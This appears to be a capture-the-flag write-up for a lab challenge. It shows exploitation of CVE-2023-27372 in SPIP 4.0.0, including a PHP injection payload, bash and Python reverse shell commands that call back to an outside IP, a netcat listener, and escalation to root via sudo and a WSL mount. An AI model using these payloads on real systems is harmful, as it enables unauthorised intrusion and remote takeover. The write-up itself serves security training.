2024 Business CTF - Vault of Hope: Submerged

Challenge Information

Summary

Submerged is a full penetration test challenge involving reconnaissance, vulnerability identification, and exploitation of a SPIP CMS installation. The target runs SPIP 4.0.0 on an nginx server with a templatemo-based website. Participants exploit CVE-2023-27372 to achieve unauthenticated remote code execution, establish shell access, and pivot through the system to capture proof of compromise.

Analysis

Reconnaissance Phase:

1. Port Scanning:

   • Port 80 (HTTP): nginx 1.18.0 redirecting to submerged.htb
   • Port 5000 (HTTP): Secondary web service

2. Virtual Host Discovery:

   • Primary: submerged.htb (static templatemo website)
   • Subdomain: spip.submerged.htb (SPIP 4.0.0 CMS)

3. Technology Stack:

   • nginx 1.18.0 (Ubuntu)
   • SPIP 4.0.0 (vulnerable version)
   • templatemo-xtra-blog template
   • PHP 7.4 FPM backend

4. Identified Credentials:

   • Email: matthew@submerged.htb
   • Hash: {a11027213cba2c293e9e0741787bd94b70b04d6ec249b0f56330c3fac77c9fa8;39a16e8754f9a67bcd791423e222259a6c32b41c5819b53a9987c0fb1125a319}

Solution

Phase 1: Vulnerability Identification

SPIP 4.0.0 is vulnerable to CVE-2023-27372 (Remote Code Execution via form serialization):

# Identify SPIP version
curl http://spip.submerged.htb/spip.php?page=backend

Phase 2: CVE-2023-27372 Exploitation

Use the exploit script (CVE-2023-27372.py) from nuts7:

python3 51536.py -u http://spip.submerged.htb -c "bash -c 'bash -i >& /dev/tcp/10.10.14.216/4444 0>&1'"

The exploit leverages the oubli parameter in the spip_pass page to inject PHP code:

data = {
    "page": "spip_pass",
    "formulaire_action": "oubli",
    "formulaire_action_args": csrf,
    "oubli": "s:20:\"<?php system('COMMAND'); ?>\";"
}

Phase 3: Initial Access

Execute reverse shell payload:

python3 51536.py -u http://spip.submerged.htb \
  -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.216\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"

Phase 4: Establish Shell

On listener (Netcat or socat):

nc -lvnp 4444

Upgrade shell to PTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Phase 5: Reconnaissance

System information:

whoami           # www-data initially
id               # Identify groups and privileges
uname -a         # Linux WIN-1EGDT8E0CN3 4.4.0-17763-Microsoft (WSL)
lsb_release -a   # Ubuntu 20.04.6 LTS

Phase 6: Privilege Escalation

Check for SUDO access:

sudo -l
# matthew user has SUDO privileges
sudo su - root

Phase 7: Proof of Exploitation

Access Windows system through WSL mount:

sudo mount -t drvfs C: /mnt/c
sudo cat /mnt/c/Users/Administrator/Desktop/root.txt

Flag:

HTB{Pwn1ng_WsL_4_7h3_W1n}

Key Takeaways

• SPIP before 4.2.1 is critically vulnerable to unauthenticated RCE via serialization
• Virtual host enumeration reveals additional attack surfaces (subdomains)
• PHP-based CMS installations require careful input validation on form data
• The formulaire_action_args CSRF token doesn’t adequately protect against code injection
• WSL (Windows Subsystem for Linux) mounts can provide lateral movement vectors to Windows
• Reverse shell payloads must be properly escaped when passed through shell interpreters
• PTY upgrade improves shell functionality for interactive exploitation
• Documentation of discovered credentials aids in privilege escalation attempts
• SUDO misconfiguration on WSL systems can lead to complete system compromise